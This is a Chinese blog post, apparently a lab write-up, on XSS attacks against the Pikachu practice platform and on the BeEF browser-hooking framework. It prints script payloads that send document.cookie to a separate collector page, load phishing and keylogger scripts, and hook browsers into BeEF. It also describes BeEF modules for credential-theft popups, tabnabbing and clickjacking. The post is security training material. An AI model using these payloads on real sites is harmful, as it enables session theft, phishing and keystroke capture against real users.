当前位置:   article > 正文

XSS平台(四) Pikachu_pikachu平台

pikachu平台

XSS(四) xss平台

1. Pikachu

1.1 基于反射型get

修改输入长度:F12
payload1:<script>document.location='http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?
cookie='+document.cookie;</script>

带着当前网站(pikachu)的cookie访问攻击者接受cookie的网站(psxss),(psxss)记录cookie并回到pikachu

payload2:http://localhost/pikachu/vul/xss/xss_reflected_get.php?message=<script>
document.location='http://127.0.0.1/pikachu/pkxss/xcookie/cookie.php?
cookie='+document.cookie;</script>&
submit=submit
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10

在这里插入图片描述

在这里插入图片描述

1.2 基于反射型POST

pikachu具有xss漏洞,当用户登录pikachu时,再去访问"127.0.0.1/pikachu/pkxss/xcookie/post.html"时,就会八cookie发送给攻击者

在这里插入图片描述

1.3 基于存储型

钓鱼

<script src="http://127.0.0.1/pikachu/pkxss/xfish/fish.php"></script>
  • 1

键盘记录

<script src="http://127.0.0.1/pikachu/pkxss/rkeypress/rk.js"></script>
  • 1

2. xss平台

xssplatform

3. beef-xss

kali beef-xss

随着对针对客户端(包括移动客户端)的 Web 传播攻击的担忧日益增加,BeEF 允许专业渗透测试人员使用客户端攻击向量来评估目标环境的实际安全态势。与其他安全框架不同,BeEF 超越了强化的网络边界和客户端系统,并在一扇敞开的门(Web 浏览器)的上下文中检查可利用性。BeEF 将钩住一个或多个 Web 浏览器,并将它们用作滩头阵地,从浏览器上下文中启动定向命令模块和对系统的进一步攻击。

在这里插入图片描述

钩子:

http://192.168.11.131:3000/hook.js
  • 1

payload:

<script src="http://192.168.11.131:3000/hook.js"></script>
  • 1

pikachu输入钩子,嵌入了代码中

在这里插入图片描述
在这里插入图片描述

beef中收到

在这里插入图片描述

detail: 浏览器、插件版本信息,操作系统信息

logs:浏览器动作:焦点变化,鼠标单击,信息输入

commands:利用模块

  • 绿色:命令模块对目标起作用,对用户应该是不可见的
  • 橙色:命令模块对目标有效,但对用户可能是可见的
  • 灰色:命令模块尚未针对此目标进行验证
  • 红色:命令模块不适用于此目标

索要凭据

简单的攻击往往是最有效的攻击。BeEF 附带了几个命令模块,这些模块为目标提供了请求凭据的熟悉接口:

  • Pretty Theft 模块向需要登录名和密码的用户打印一条简单消息,说明会话已超时。它有许多模仿流行的社交网络/市场主题的预设。
  • Simple Hijacker 模块允许您在用户单击其当前页面上的任何链接时加载许多常见的弹出窗口。弹出模板包括证书警告、标准警报样式提示和信用卡付款表单。
  • Clippy 是一个模块,用于创建一个小型浏览器助手,该助手可以提出浏览器更新。

一个漂亮的盗窃弹出模板:

在这里插入图片描述

重定向至另一页

存在许多 BeEF 模块,允许您重定向到外部页面:

  • Redirect Browser模块可以将挂钩的页面重定向到任何其他页面。
    • 请注意,用户没有任何操作的自发重定向可能会导致他们立即关闭僵尸。
    • 为了避免从 BeEF 中丢失僵尸,重定向浏览器 (iFrame) 子模块将创建一个完整的视口 iFrame,该视口重定向到指定的 URL。
  • TabNabbing 模块将检测用户何时失去对当前选项卡的关注,并在后台对其进行修改。当用户返回到选项卡时,他们将查看包含指定 URL 内容的完整视口 iFrame。

Chrome/Firefox 扩展程序

使用 BeEF 可以让用户安装恶意浏览器扩展:

点击劫持

BeEF 包含一个模块,该模块可在挂钩的浏览器中启用点击劫持攻击:

  • Clickjacking模块将创建一个 iFrame,该 iFrame 跟随用户在页面上的光标,在指定的 URL 上显示内容。
  • Clickjacking模块将创建一个 iFrame,该 iFrame 跟随用户在页面上的光标,在指定的 URL 上显示内容。
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小小林熬夜学编程/article/detail/712763
推荐阅读
相关标签
  

闽ICP备14008679号